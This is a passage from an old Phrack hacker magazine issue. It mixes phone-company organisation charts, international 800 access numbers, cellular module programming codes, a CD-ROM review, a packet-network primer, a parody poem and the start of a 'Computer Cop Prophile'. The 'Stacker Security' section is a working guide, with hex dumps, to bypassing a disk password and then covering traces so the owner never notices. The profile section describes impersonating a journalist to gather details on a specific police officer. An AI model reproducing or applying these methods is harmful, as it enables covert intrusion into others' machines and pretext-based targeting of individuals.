  3274.                              Phrack Magazine
  3275.  
  3276.  
  3277. In an effort to assist the hacking world in their understanding of the
  3278. organizational mess created by our fabulous friends at the RBOCs, we have
  3279. compiled a list of the various organizations, what their functions are,
  3280. which centers they are made up of, and which computer systems they use.
  3281.  
  3282. -----------------------------------------------------------------------------
  3283.  
  3284.                          Planning and Engineering
  3285.  
  3286.             Defines network resources available for assignment
  3287.  
  3288. Functions:
  3289.  
  3290.   Long range and current planning for outside plant, wire centers,
  3291.     interoffice network, special services, interexchange access
  3292.     services, and message trunks
  3293.   Exchange network design
  3294.   Coordination of activities connected with installation and/or modification
  3295.     of exchange network components
  3296.  
  3297. Centers:
  3298.  
  3299.   DSPC
  3300.   SCPC
  3301.   WCFPC
  3302.   CAC
  3303.   IFFPC
  3304.   IFCPC
  3305.   TEC
  3306.   MEC
  3307.   DSDC
  3308.   EEC
  3309.   CSEC
  3310.  
  3311. Systems:
  3312.  
  3313.   LEIS
  3314.   NPS
  3315.   FEPS
  3316.   LSRP
  3317.   INPLANS
  3318.   INFORMS
  3319.   DFDS
  3320.   SSFS
  3321.   PICS
  3322.   LATIS
  3323.   CAMIS
  3324.   CUCRIT
  3325.  
  3326. -----------------------------------------------------------------------------
  3327.  
  3328.                            Service Provisioning
  3329.  
  3330.               Allocates assignable existing network resources
  3331.  
  3332. Functions:
  3333.  
  3334.   Circuit design and routing
  3335.   Verification and assignment of network elements
  3336.   Controlling and tracking orders during assignment process
  3337.  
  3338. Centers:
  3339.  
  3340.   CPC - Circuit Provisioning Center
  3341.   LAC - Loop Assignment Center
  3342.  
  3343. Systems:
  3344.  
  3345.   TIRKS
  3346.   SOAC
  3347.   SWITCH
  3348.   COSMOS
  3349.   WM
  3350.   LFACS
  3351.   LOMS
  3352.  
  3353. -----------------------------------------------------------------------------
  3354.  
  3355.                              Network Operations
  3356.  
  3357.            Controls installation, maintenance and testing of circuits
  3358.  
  3359. Functions:
  3360.  
  3361.   Coordination and performance of the activities required to provide service
  3362.   Surveillance and control of network equipment and facilities
  3363.   Analysis, sectionalization, and repair of switching and transmission
  3364.     facilities
  3365.   Status reporting on service order and/or service restoration activities
  3366.  
  3367. Centers:
  3368.  
  3369.   CRSAB
  3370.   ICC
  3371.   MC
  3372.   NAC
  3373.   RCMAC
  3374.   SEAC
  3375.   SSC
  3376.   FMAC
  3377.   STC
  3378.   DNCC
  3379.   FCC
  3380.   SCC
  3381.  
  3382. Systems:
  3383.  
  3384.   McTE
  3385.   GDS
  3386.   LMOS
  3387.   EADAS
  3388.   TAN
  3389.   RSA
  3390.   CRAS
  3391.   CIMAP
  3392.   NDS
  3393.   SEAS
  3394.   MAS
  3395.   MIZAR
  3396.   SARTS
  3397.   TCAS
  3398.   CAROT
  3399.   NMA
  3400.   NMPS
  3401.   SCCS
  3402.  
  3403. -----------------------------------------------------------------------------
  3404.  
  3405.                                Customer Services
  3406.  
  3407.                      Direct company contact with customers
  3408.  
  3409. Functions:
  3410.  
  3411.   Service negotiation with customers
  3412.   Creating and routing associated service orders
  3413.   Creating and maintaining customer records
  3414.   Reporting the provisioning status to customers
  3415.   Initiating billing and collection processes
  3416.   Handling billing and general service inquiries
  3417.  
  3418. Centers:
  3419.  
  3420.   RSC - Residence Service Center
  3421.   BSC - Business Service Center
  3422.   ICSC - Interexchange Carrier Service Center
  3423.  
  3424. Systems:
  3425.  
  3426.   BOFADS - Business Office Force Administration Data System
  3427.   PREMIS - Premises Information System
  3428.   SOP - Service Order Processor
  3429.   CABS - Carrier Access Billing System
  3430.   BOSS - Billing and Order Support System
  3431.   CRIS - Customer Records Information System
  3432.   BRIS - Business Revenue Information System
  3433.   CLAIMS
  3434.  
  3435. -----------------------------------------------------------------------------
  3436.  
  3437.                             Quick Breakdown
  3438.  
  3439. Process                    Center                   System
  3440. -----------------------------------------------------------------------------
  3441.  
  3442. Planning & Engineering
  3443.  
  3444.     IOF                    IFCPC  IFFPC  IOF/EDC    FEPS  NPS-F
  3445.  
  3446.     Switch                 SCPC  WCPC  EEC          LSD&F  LSRP  NDS
  3447.                                                     TNDS/EQ  NPS-W
  3448.  
  3449.     Distribution           DSPC  DSDC               LATIS  LEIS  NPS-D
  3450.  
  3451. Service Provisioning
  3452.  
  3453.      IOF                   CAC                      TIRKS
  3454.  
  3455.      Switch                LAC                      COSMOS
  3456.  
  3457.      Distribution          LAC                      LFACS
  3458.  
  3459. Network Operations
  3460.  
  3461.      IOF                   FMAC                     CAROT   CIMAP   TCAS
  3462.                                                     TNDS/TK
  3463.  
  3464.      Switch                NAC  RCMAC  SCC          EADAS  NDS  MAS  MIZAR
  3465.                                                     TASC  CIMAP  NMA  NMPS
  3466.                                                     SCCS
  3467.  
  3468.      Distribution          ICC  MC                  GDS  CRAS  LMOS/MLT
  3469.                                                     PREDICTOR  TAN
  3470.  
  3471. *******************************************************************************
  3472.  
  3473.     -IS- Blue Boxing Dead?
  3474.  
  3475. Australia Direct        800-682-2878
  3476. Austria Direct          800-624-0043
  3477. Belgium Direct          800-472-0032
  3478. Belize Direct           800-235-1154
  3479. Bermuda Direct          800-232-2067
  3480. Brazil Direct           800-344-1055
  3481. British VI Direct       800-248-6585
  3482. Cayman Direct           800-852-3653
  3483. Chile Direct            800-552-0056
  3484. China Direct            800-532-4462
  3485. Costa Rica Direct       800-252-5114
  3486. Denmark Direct          800-762-0045
  3487. El Salvador Direct      800-422-2425
  3488. Finland Direct          800-232-0358
  3489. France Direct           800-537-2623
  3490. Germany Direct          800-292-0049
  3491. Greece Direct           800-443-5527
  3492. Guam Direct             800-367-4826
  3493. HK Direct               800-992-2323
  3494. Hungary Direct          800-352-9469
  3495. Indonesia Direct        800-242-4757
  3496. Ireland Direct          800-562-6262
  3497. Italy Direct            800-543-7662
  3498. Japan Direct            800-543-0051
  3499. Korea Direct            800-822-8256
  3500. Macau Direct            800-622-2821
  3501. Malasia Direct          800-772-7369
  3502. Netherlands Direct      800-432-0031
  3503. Norway Direct           800-292-0047
  3504. New Zealand Direct      800-248-0064
  3505. Portugal Direct         800-822-2776
  3506. Panama Direct           800-872-6106
  3507. Philippines Direct      800-336-7445
  3508. Singapore Direct        800-822-6588
  3509. Spain Direct            800-247-7246
  3510. Sweden Direct           800-345-0046
  3511. Taiwan Direct           800-626-0979
  3512. Thailand Direct         800-342-0066
  3513. Turkey Direct           800-828-2646
  3514. UK Direct               800-445-5667
  3515. Uruguay Direct          800-245-8411
  3516. Yugoslavia Direct       800-367-9841 / 9842
  3517.  
  3518. This file brought to you by The Phone Company
  3519.  
  3520. *******************************************************************************
  3521.  
  3522.               *****************************************
  3523.               * Step-by-step Programming Instructions *
  3524.               *      For the EO Cellular Module       *
  3525.               *****************************************
  3526.  
  3527. 1.  Unbox and attach the EO Cellular Module to the EO Personal
  3528.     Communicator 440/880.
  3529.  
  3530. 2.  Once the EO Cellular Module is attached turn on the EO Personal
  3531.     Communicator 440/880.
  3532.  
  3533. 3.  Open EO Phone.
  3534.  
  3535. 4.  Tap "Options."
  3536.  
  3537. 5.  Tap "Authorized Dealer."
  3538.  
  3539. 6.  Write Dealer Code in space provided.  Dealer code is *12345678#.  To edit
  3540.     mistakes, draw a small circle around 2 or 3 of the numbers entered.
  3541.     This will bring up an edit box and allow easier entry of the number.
  3542.     Once you have made your corrections, tap "OK."
  3543.  
  3544. 7.  Tap "OK" on the "Authorized Dealer Code" pop-up.
  3545.  
  3546. 8.  Wait approx. 30 seconds and programming screen will appear (The "busy
  3547.     clock" will appear on screen).
  3548.  
  3549. 9.  If invalid code entry screen appears, the programming screen will be
  3550.     blank and the "Apply" and "Apply and Close" buttons at the bottom
  3551.     will be greyed out.  Close the programming screen by tapping on the
  3552.     upper left blacked out corner of the screen.  Re-do steps 4 through 7
  3553.     (refer to the TIP below for a guaranteed method of accurate entry).
  3554.     A common problem is to enter an "l" instead of a "1" because they appear
  3555.     to be very similar.  To make sure that you have entered a one, check to
  3556.     see that the character is the same height as the other numbers.  The
  3557.     letter "l" will be slightly taller.
  3558.  
  3559. TIP:  To insure that you have entered the correct digits (one versus letter
  3560.       "l" problem above) you can use the accessories keyboard.  To use the
  3561.       keyboard for the Dealer Code entry do the following (replaces steps
  3562.       4, 5, and 6 above):
  3563.  
  3564.       a.  Tap Accessories in the lower bookshelf.
  3565.       b.  Tap Keyboard.  This will bring up the pop-up keyboard.
  3566.       c.  Tap Options at the top of the EO Phone window.
  3567.       d.  Tap Authorized Dealer.  This will bring up the Dealer Code pop-up.
  3568.       e.  Tap on the line in the Dealer Code box.  A dot (or character) will
  3569.           appear and now entry from the keyboard will appear in the Dealer
  3570.           Code box.
  3571.       f.  Now use the keyboard to delete the dot (or character).  The Delete
  3572.           key is the upper right most key on the keyboard.
  3573.       g.  Now use the keyboard to enter the dealer code - *12345678#
  3574.           (the * and the # keys can be found by tapping the shift
  3575.           (up arrow) keys.)
  3576.       h.  GO TO STEP 7 and continue.
  3577.  
  3578. NOTE:  When programming the following entries always use the circle gesture
  3579.        to change the entry.  In other words, circle the existing entry
  3580.        to bring up the edit combs.  Then correct each digit by writing over
  3581.        the existing digit.  This will insure that the number of digits for
  3582.        each entry is correct.  If an entry has an incorrect length then
  3583.        none of the programed entries will be accepted.
  3584.  
  3585. 10.  Enter the assigned telephone number in the first field.  Use the
  3586.      circle gesture to bring up the edit combs to edit the existing
  3587.      telephone number.  Change each digit by writing over it in the edit
  3588.      combs.  When complete tap "OK."
  3589.  
  3590. 11.  Use the same procedure in step 10 to enter the appropriate SID
  3591.      in the second field.
  3592.  
  3593. 12.  Use the same procedure in step 10 to enter the corresponding IPCH
  3594.      (0333 for the non-Wireline or A side provider; 0334 for the Wireline
  3595.      or B side provider) in the third field.
  3596.  
  3597. 13.  Leave the remaining fields intact as already programed from the
  3598.      factory unless instructed to change them by the cellular service
  3599.      provider.  Use the circle/edit method to change any necessary
  3600.      entries.  The factory defaults are:
  3601.  
  3602.      Field Title        Default Value
  3603.      -----------        -------------
  3604.      ACCOLC             00
  3605.      Group ID           15
  3606.      Lock Code          1234
  3607.      SCM                1010
  3608.      Security Code      123456
  3609.      Emergency Code     911
  3610.  
  3611. 14.  Tap the "Apply" button on the bottom of the screen.  The programming
  3612.      information you have entered is now being saved in the EO Cellular
  3613.      Module.  This will take approximately 20 seconds.
  3614.  
  3615. 15.  Close the programming screen by tapping the blackened area in the upper
  3616.      left hand corner of the programming screen.
  3617.  
  3618. 16.  Now set the approximate Roaming Option.
  3619.  
  3620. 17.  Tap Options.
  3621.  
  3622. 18.  Tap Roaming.
  3623.  
  3624. 19.  Enter Security Code.  Default is 123456.
  3625.  
  3626. 20.  Tap "OK."
  3627.  
  3628. 21.  Tap next to appropriate roaming option.  A check mark will appear.
  3629.  
  3630. 22.  Tap "Apply" button.
  3631.  
  3632. 23.  Close window.
  3633.  
  3634. 24.  Check status line in EO Phone for appropriate indications.
  3635.  
  3636. 25.  Tap "Keypad" tab on right side of EO Phone window.  This will bring
  3637.      up a keypad display which can be used to place a voice call.
  3638.  
  3639. 26.  Make sure that the Cellular Icon is boxed (as opposed to the Phone
  3640.      Icon in the lower left hand of EO Phone.)
  3641.  
  3642. 27.  Tap the keypad buttons to enter the number to be dialed.  The digits will
  3643.      appear in the dial box at the middle bottom of the EO Phone window.
  3644.  
  3645. 28.  Pick up the handset and tap "DIAL" button in the lower right hand
  3646.      corner of the screen.  This button is just like hitting SEND button
  3647.      on a cellular phone.  This will place a voice call using the number
  3648.      in the dial box.
  3649.  
  3650. 29.  When call is complete tap "Hang-up" (the DIAL button to "Hang-up" after
  3651.      the call is connected to the network.)  This is just like pressing END
  3652.      on a cellular phone.
  3653.  
  3654. 30.  Close EO Phone.
  3655.  
  3656. 31.  Programming and testing is now complete.
  3657.  
  3658. Helpful Information
  3659.  
  3660. The EO Cellular Module contains an OKI 910 cellular phone housed in
  3661. specially designed, plated plastics with custom connections into the
  3662. proprietary port on the phone.
  3663.  
  3664. All programming of this module is done via the EO Personal Communicator
  3665. 440 or 880.  All programming/configuration information for the phone is
  3666. stored in the EO Cellular Module and not in the Personal Communicator.
  3667. This means that once the EO Cellular Module is programed it can be removed
  3668. from the EO Personal Communicator and reattached to any other EO Personal
  3669. Communicator without re-programming.
  3670.  
  3671. The ESN for the EO Cellular Module can be derived from the Serial number
  3672. in the window on the bottom of the module.  The cellular module ESN is 129
  3673. followed by the last eight digits of the serial number in the window.  These
  3674. eight digits will usually begin with 013.  This eleven digit number should
  3675. be provided to the people that will actually assign the telephone number
  3676. and activate the EO Cellular Module on the cellular network.
  3677.  
  3678. *******************************************************************************
  3679.  
  3680. THE HACKER CHRONICLES CD-ROM
  3681.  
  3682. Well, he said he was going to do it, and he did.
  3683.  
  3684. Scan Man put out a CD-ROM of info collected from the
  3685. underground.  I had kind of forgotten he was going to
  3686. do it, but once I heard rumors of such a thing, I knew he
  3687. had.
  3688.  
  3689. At HoHo Con last year, Bootleg was very excited about
  3690. compiling data from the community for the project he
  3691. and Scan Man were working on.  As things progressed
  3692. however, Bootleg would soon find out that Scan Man
  3693. had no intention of working with him, and cut him out of
  3694. the project.
  3695.  
  3696. This is how it was explained to me.  I hope that it is
  3697. not true, since Bootleg is back in jail and wouldn't
  3698. have the ability to fly out to West Virginia and throttle
  3699. Scan Man about the head and neck.
  3700.  
  3701. [Description from the Jewel Box]
  3702.  
  3703. WARNING!
  3704.  
  3705. This material is controversial in nature and may be offensive
  3706. to some viewers.  Not that the information in and of itself is
  3707. not illegal.  Quite often the usage of certain information is
  3708. illegal.  The Hacker Chronicles is for informative and educational
  3709. purposes only.  All documents and programs in this compilation were
  3710. legally available to the public prior to his publication.  None of
  3711. these criminal acts described on this disc are in any way
  3712. condoned or should be attempted.
  3713.  
  3714.   Over 12 YEARS in the making - this software package contains stories
  3715.   of how they did it, actual break-ins, arrests, and prosecutions.  Most
  3716.   of the articles were written by the actual people who committed these
  3717.   acts.  Access articles and software with an easy-to-use menu system.
  3718.  
  3719.   Areas of information include:  PHONE PHREAKING (so called hobbyists
  3720.   who are into telephone technology of all types, well known for their
  3721.   ability to bypass telephone billing system), COMPUTER HACKERS
  3722.   (sometimes referred to as cyberpunks, interested in access to any on
  3723.   line computer system they can find), SATELLITE COMMUNICATIONS
  3724.   (hobbyists who sometimes employed test software designed for dealers
  3725.   to defeat scrambling systems), "UNDERGROUND" GENERAL INFORMATION (many
  3726.   subjects all very technical in nature and explained in detail, such as
  3727.   ATM's, credit cards, voice mail, hypnotism, bugging, skip tracing,
  3728.   phone taps, cellular phones, lock picking, social engineering,
  3729.   virus's, chemical substances, explosives, editorials, legal issues,
  3730.   alarm systems, spies, hardware, signal interception, private
  3731.   investigations, security, computer ethics, underground BBS's, TV cable
  3732.   piracy, boxing and much more!
  3733.  
  3734. -----
  3735.  
  3736. Uh, that kinda says it all, don't it?  CYBERPUNKS, VIRII, WAREZ & STUFF!
  3737. Uh, yeah.
  3738.  
  3739. Seriously, the disk itself has a shitload of files.  This
  3740. is rather cool, since now EVERY bbs in the world can put
  3741. OVER 650 MEGS OF G-FILES!  Heh.
  3742.  
  3743. The file on the disc that struck me the most was the
  3744. intro written by Scan Man.  He went talked about
  3745. a lot of things he's done in the past with the scene,
  3746. telephone companies, etc.  I know Scan Man from WAY back.
  3747. Pirate-80 was one of the first real Hacker BBSes I was
  3748. ever on.  (Remember when it was only up certain hours of the day?)
  3749. Reading that file was pretty informing for me.  It also
  3750. made me smile to see that he's still pissed off at Craig
  3751. for tearing him apart in a Phrack some years ago.
  3752.  
  3753. Remember, this is by no means a complete collection.
  3754. Thankfully, the CD does not have any issues of Phrack
  3755. magazine past issue 41 (or else, I would be enjoying
  3756. a piece of the revenue :) ).  It also, oddly enough,
  3757. does not have any LOD-TJ other than 4.  It DOES however
  3758. have a large collection of CUD, NIA & CDC.  Go figure.
  3759.  
  3760. The files do represent a neat history of our community
  3761. and for the curious neophyte, the nostalgic old-timer, or
  3762. anyone with 39 bucks, it might be something worth picking
  3763. up just to say you have it.  I mean, you never know when
  3764. you will need to find issue 12 of LOL, or plans for a
  3765. urine box.  It will save you the trouble of downloading.
  3766.  
  3767. The Hacker Chronicles - A Tour of the Computer Underground
  3768. should be available from any outlet that carries CD-ROMS.
  3769. Or hell, call P-80.  I'm sure Scan Man will sell you a copy:
  3770. 304-744-7322.
  3771.  
  3772. *******************************************************************************
  3773.  
  3774. Packet Switched Data Networks
  3775. An Introduction and Overview
  3776. By: Cosmos
  3777.  
  3778.  
  3779. The abundance of networks both private and public has given the hacker
  3780. an almost infinite playground.  A popular type of network is the
  3781. packet switched network like SprintNet (TELENET) that allows local
  3782. users to access non-local machines.  These WAN's usually serve as
  3783. the backbone for many large corporations.  Understanding the way
  3784. in which they operate can aid many aspects of the hacker's knowledge.
  3785.  
  3786. Packet switching is a data networking technology in which user data is
  3787. segmented into small units (packets) and transmitted from the sending
  3788. user to the receiving user over shared communications channels.  Each
  3789. individual packet also holds additional information that allows the
  3790. network to correctly route the packet to the correct destination.  The
  3791. size of the packet is limited to a maximum number of characters set by
  3792. the individual sender.  Packets are measured in octets, which are 8-bit
  3793. bytes.  User data that exceeds this amount is divided into multiple
  3794. packets.
  3795.  
  3796. The difference between packet switching and circuit switching
  3797. (regular telephone lines) lies in the use of virtual circuits.
  3798. These circuits are given the term "virtual" because:
  3799.  
  3800.  1)  they are made up of bandwidth allocated on demand from
  3801.      a pool of shared circuits
  3802.  
  3803.  2)  no direct physical connection is made on a packet network
  3804.  
  3805.  3)  the connection is a logical one
  3806.  
  3807. Due to these facts, packet networks are commonly denoted as connectionless
  3808. networks.  There are three types of packet networks:  public, private, and
  3809. hybrid (a combo of the two previous ones).
  3810.  
  3811. A packet switched data network (PSDN) has five major components:
  3812.  
  3813. 1) local access components (LAC)
  3814. 2) packet assemblers/disassemblers (PAD)
  3815. 3) packet switching nodes (PN)
  3816. 4) network links (NL)
  3817. 5) a network managment system (NMS)
  3818.  
  3819. LOCAL ACCESS COMPONENTS
  3820.  
  3821. To transmit data through a PSDN, the data must first move from the
  3822. end-user to a packet assembler/dissasembler (PAD) or to a packet
  3823. switching node with a built-in PAD function.  In order to achieve
  3824. this, three local access components are required.  First is the
  3825. end-user data terminal, or more plainly, your computer.  Secondly,
  3826. an end-user transmission device such as a modem.  Thirdly, a
  3827. local access facility or physical line (Telephone Line).  There are
  3828. three types of physical lines: switched analog lines (dial up), leased
  3829. analog channels (private lines), and leased digital channels (DDS circuits).
  3830.  
  3831. PACKET ASSEMBLERS/DISASSEMBLERS
  3832.  
  3833. All data travelling through the PSDN must be routed through a
  3834. Packet Assembler/Disassembler (PAD).  The PAD's primary function
  3835. is to translate user data into network packet format and conversely to
  3836. convert network packets into user data.  Basically, a PAD serves
  3837. as the network translator between the user and the PSDN.  Other functions
  3838. performed by the PAD include: physical line concentration, call setup
  3839. and clearing functions, protocol conversion, code conversion, protocol
  3840. emulation, local switching functions, and local call billing functions.
  3841.  
  3842. PACKET SWITCHING NODES
  3843.  
  3844. The primary component of a packet switching network is the packet
  3845. switching node (PN).  The packet switching node ensures that each
  3846. packet is routed properly through the network.  Commonly, PN
  3847. configurations are installed in a redundant configuration.  This
  3848. provides for a convenient backup for network traffic.  Other functions
  3849. include: call billing, internal network diagnostics, support of
  3850. direct host computer access., and inter-network gateway connections.
  3851.  
  3852. NETWORK LINKS
  3853.  
  3854. Network links are the physical components that connect packet switching
  3855. nodes together.  Several transmission technologies can be employed
  3856. in network linking, including:  analog circuits, digital circuits,
  3857. microwave systems, and satellite systems.  The most common network
  3858. link technologies used are Digital Dataphone and other similar
  3859. interexchange carrier services, and point to point analog private
  3860. lines.  Speeds on network links range from 9.6 Kbps to 56/64 Kbps.
  3861. Network links are commonly denoted as the "backbone layer" or
  3862. the backbone packet network.  The local PAD's are termed the
  3863. "access layer" or access network.
  3864.  
  3865. NETWORK MANAGEMENT SYSTEM
  3866.  
  3867. Basically, the network management system (NMS) controls and monitors
  3868. the PSDN.  It primarily stores and performs maintenance on the
  3869. network database.  This database is the master copy of all the software
  3870. and configurations in each network node.  If a node fails or is
  3871. not functioning properly, the NMS can download backup information through
  3872. the various network links to solve the problem.  Thus, a unattended
  3873. network is formed.
  3874.  
  3875. This is all one needs to understand for a general knowledge of
  3876. a packet switched data network.  Additional topics can be
  3877. pursued further for increased knowledge but are not essential.
  3878. You might want to research some info on the standard X.25 protocol,
  3879. and other OSI stuff.  Anyways, I hope this brief intro article can
  3880. be of use in the general knowledge of computer networking.
  3881.  
  3882. Cosmos
  3883.  
  3884. *******************************************************************************
  3885.  
  3886.    Stacker Security.
  3887.  
  3888.  
  3889. How to Hack a Stacker disk that is password protected!
  3890.  
  3891. The 'Stacker' Software increases the space on your hard disk by using
  3892. on the fly compression on the data on the disk.  It does this by creating
  3893. a file called Stacvol.dsk on the hard drive.  All of the information that
  3894. is put on the disk is compressed and stored in the stacvol.dsk file.
  3895. When Stacker is installed on a hard drive, say C: all of the data on
  3896. the disk is compressed and stored in the stacvol.dsk file, which is
  3897. assigned as a virtual disk C:, the 'real' drive is then assigned D:.
  3898. The swapping taking place a boot time.
  3899.  
  3900. The Stacvol.dsk file is therefore stored on the D: drive and usually
  3901. takes up most of the drive. (ie: a 40M C: drive contains the stacvol.dsk
  3902. file of size around 5-39M the disks are swapped at boot time and
  3903. the C: drive that the user 'sees' is really the contents of the stacvol.dsk
  3904. file on the D drive assigned to C:, everything on the C drive (stacvol.dsk)
  3905. is compressed, thus obtaining an increased disk space.)
  3906.  
  3907. The point is this, at boot time the owner of the machine can set passwords
  3908. to allow the user to have no access, read/write or read-only access to
  3909. the C drive/stacvol.dsk file, if a wrong password is entered the stacvol
  3910. file is not mounted as the C drive and all a DIR will get you is a directory
  3911. of C:\ which will have a few files such as command.com etc, nothing
  3912. of any real interest.
  3913.  
  3914. So now for the interesting bit, how to get in without a password,
  3915. or getting read/write privs when you've only got read-only.
  3916.  
  3917. First, boot the computer and go through the password routine.
  3918. Get it wrong (you may as well try something like password though just in
  3919. case.)
  3920.  
  3921. The Stacvol.dsk file is hidden so change its file attributes so you
  3922. can edit it. (You'll need a floppy now with a utility such as Norton
  3923. diskedit on it)
  3924.  
  3925. Load in the diskeditor and get it so that you are editing the stackvol
  3926. file in a HEX mode.  The first bit of Hex just contains the usual sort of
  3927. boot record type rubbish, not too interesting.
  3928.  
  3929. The interesting bit is the bit which starts at offset 74
  3930.  
  3931. Now the information starting at 00040 is the interesting bit,
  3932. on a disk with a password set it will look like this....
  3933.  
  3934. 00040   20 20 20 20 20 20 20 20 | 20 20 2D 2A 2D 0A 0A 1A
  3935. 00050   72 AA 91 9C 0F 66 9A ED | AB 18 6E 6D E2 C3 2B 8B
  3936. 00060   5E CD EF A9 37 1B 53 E2 | C6 F0 E8 9C A4 49 F6 9D
  3937. 00070   4C F0 AB 32 21 47 FC 91 | 7E 8C 58 D8 D9 D7 DB D3
  3938.  
  3939. (All figures obviously in hex.)
  3940.  
  3941. The data from 0004B to 0004E is a flag to the device driver to tell
  3942. it that a password is required.
  3943.  
  3944. From 0004f to 0005F are the encrypted passwords.
  3945. (the rest just being data)
  3946.  
  3947. NOW, for an unpassworded file this looks like
  3948.  
  3949. 00040   20 20 20 20 20 20 20 20 | 20 20 20 20 20 0D 0A 1A
  3950. 00050   49 F6 9D 4E EC B1 26 3D | 0F 6B B2 24 41 07 7B 92
  3951. 00060   XX XX XX XX XX XX XX XX | XX XX XX XX XX XX XX XX
  3952. 00070   XX XX XX XX XX XX XX XX | XX XX XX XX XX XX XX XX
  3953.  
  3954. Now all you have to do is take a copy of the data in this section
  3955. on the stacvol.dsk file you are hacking so that you can return it back to
  3956. its original state!
  3957.  
  3958. Patch the code above into the corresponding positions into the
  3959. file you are hacking, leaving the code denoted by XX alone, this is version
  3960. code and depends on the machine so leave it alone!
  3961.  
  3962. Save the changes and reboot the machine, it will no longer ask for a
  3963. password and you now have full access.
  3964.  
  3965. Afterwards re-patch the original code that you noted and if you've used
  3966. your common sense then the owner will never know you were there.
  3967.  
  3968. (By common sense I mean don't forget to restore time/date stamps etc.)
  3969.  
  3970. D2A  [D
  3971.  
  3972. *******************************************************************************
  3973.  
  3974.                        UNAUTHORIZED ACCESS ONLY
  3975.  
  3976. Computers are becoming an integral part of our everyday existence.  They are 
  3977. used to store a multitude of information, from credit reports and bank
  3978. withdrawals to personal letters and highly sensitive military documents.
  3979. So how secure are our computer systems?
  3980.  
  3981. The computer hacker is an expert at infiltrating secured systems, such as 
  3982. those at AT&T, TRW, NASA and the DMV.  Most computer systems that have a 
  3983. telephone connection have been under seige at one time or another, many 
  3984. without their owner's knowledge.  The really good hackers can re-route the
  3985. telephone system, obtain highly sensitive coporate and government documents,
  3986. download individuals credit reports, make free phone calls globally, read 
  3987. private electronic mail and corporate bulletins and get away without ever 
  3988. leaving a trace.
  3989.  
  3990. So who are these hackers?  Just exactly WHAT do they DO, and WHY do they do
  3991. it?  Are they really a threat?  What do they do with the information 
  3992. they obtain?  Are hackers simply playing an intellectual game of chess or
  3993. are hackers using technology to effectively take control of corporate and 
  3994. government systems that have previously appeared omnipotent?
  3995.  
  3996. Our group is in the course of filming "Unauthorized Access", a documentary 
  3997. that will demistify the hype and propoganda surrounding the computer hacker.  
  3998. We will expose the truths of this sub-culture focusing on the hackers 
  3999. themselves.  This will be a view from inside the global underground.  
  4000. We intend to shoot in the United States, Holland and Germany.
  4001.  
  4002. This documentary will be of the highest broadcast quality and is 
  4003. intended for international television, festival and theatrical distribution.
  4004.  
  4005. We are currently looking for additional financial backers interested in this
  4006. project. For more information about "Unauthorized Access" or if 
  4007. you are intrested in providing any information or support, please contact 
  4008. annaliza@netcom.com.
  4009.  
  4010. *******************************************************************************
  4011.  
  4012. Mitnick's Soliloquy
  4013.  
  4014. Intruder, or not Intruder: that is the question:
  4015. Whether 'tis more likely the system suffers
  4016. The misuses and malfeasances of outrageous crackers
  4017. Or that some user behaves anomalously
  4018. And, by so doing, causes false alarms.  To alert, to audit;
  4019. No more; and by an audit to say we find the attack,
  4020. And the thousand failed login attempts
  4021. That are seen on the network, 'tis a consummation
  4022. Devoutly to be decrypted.  To alert, to audit.
  4023. To audit, perchance to detect, ay, there's the rub.
  4024. For in that detection of attack what false alarms may come;
  4025. When we have dumped a million packets
  4026. Must give us pause, the analysis
  4027. That makes use of long CPU hours and many gigabytes
  4028. For who would bear the whips and scorns of time
  4029. The analysis by hand, the tired SSOs eyes sore,
  4030. The pangs of innocent users, the law's delay,
  4031. The insolence of phreaks, and the spurns
  4032. That patient merit of unworthy takes
  4033. When he himself might his quietus make
  4034. By a disconnected ethernet?  who would fardles bear
  4035. To grunt and sweat under C2 standards
  4036. But that the dread of worm after worm
  4037. The undiscovered bug from whose bourn
  4038. No Vandal turns, puzzles the testers,
  4039. And makes us rather ebar those ills we have
  4040. That crash the system and erase the hard drive?
  4041. Thus intrusion detection makes abusers of us all,
  4042. And thus the native hue of normal use
  4043. Is sicklied over with the red light of intruder,
  4044. and jobs of great size and duration
  4045. With this regard their patterns out of normal parameters,
  4046. and lose the name of legal system policy.
  4047.  
  4048.                 After Hamlet's Soliloquy,
  4049.                 By JJ
  4050.  
  4051. *******************************************************************************
  4052.                               ==Phrack Magazine==
  4053.  
  4054.                  Volume Four, Issue Forty-Four, File 5 of 27
  4055.  
  4056. ****************************************************************************
  4057.  
  4058.                              Computer Cop Prophile
  4059.  
  4060.                                 by The Grimmace
  4061.  
  4062.  
  4063.  
  4064.     The following file is something I thought of and did
  4065. a LOT of research on before writing.  It's something that
  4066. I haven't seen in PHRACK and I've been a devout fan of
  4067. this zine since the beginning.
  4068.  
  4069.     The "PHRACK PROPHILES" on hackers and phreakers give
  4070. readers an insight into the movers and shakers of the P/H
  4071. world, but how about a profile or profiles on the
  4072. anti-hacker/phreaker establishment that seems to be
  4073. growing by leaps and bounds lately?
  4074.  
  4075.  In the past years we've seen cops and feds who know
  4076. nothing about computers and/or telephone systems bungle their
  4077. way through search warrants and arrests and have had some good
  4078. laughs at their expense.  But now it seems that the "computer
  4079. cops", the feds especially, are putting a big push on training
  4080. agents in the "tricks of the trade" and their conviction rate
  4081. is getting better.
  4082.  
  4083.  The primary source of this training is the Federal Law
  4084. Enforcement Training Center in Glynco, Georgia, where they're
  4085. teaching computer seizure and analysis techniques,
  4086. computer-targeted search warrants, and telecommunications fraud
  4087. investigations.  (They're very accommodating about giving out
  4088. information on the phone as long as you tell them you're a
  4089. cop).  The FBI Academy in Quantico also has a computer crimes
  4090. course.
  4091.  
  4092.     On the technical side of things, there's an organization
  4093. called IACIS which stands for the International Association
  4094. of Computer Investigative Specialists based in Portland,
  4095. Oregon, and which consists of members of both local law
  4096. enforcement agencies nationwide as well as various and
  4097. sundry federal agencies.  This group teaches and certifies
  4098. cops in how to get evidence from computer systems that can't be
  4099. attacked in court (Of course, anything CAN be attacked, but
  4100. getting the evidence squashed is not always a sure thing unless
  4101. the judge is a computerphobe).
  4102.  
  4103.  As much satisfaction as we've gained at the expense of
  4104. the US Secret Service from the Steve Jackson Games case, it's
  4105. widely publicized problems may prove to be a double-edged sword
  4106. hanging over our heads.  Law enforcement learned a LOT of lessons
  4107. from mistakes made in that investigation.
  4108.  
  4109.     Like most of you, I've spent a lot of years
  4110. exploring computer systems (usually those belonging to others)
  4111. and personally feel that I've done nothing wrong (know the
  4112. feeling?).  I'm sure others across the country also can
  4113. conduct a little socially-engineered reconnaissance and
  4114. get the lowdown on some of the people we NEVER want to see
  4115. knocking on our doors with a sledge hammer in the middle of the
  4116. night.
  4117.  
  4118.     This profile contains information on the ONLY computer
  4119. crime cop I could identify in the Louisville/Jefferson County
  4120. area after calling all the major departments posing as a writer
  4121. for a law enforcement magazine doing a survey.  Information
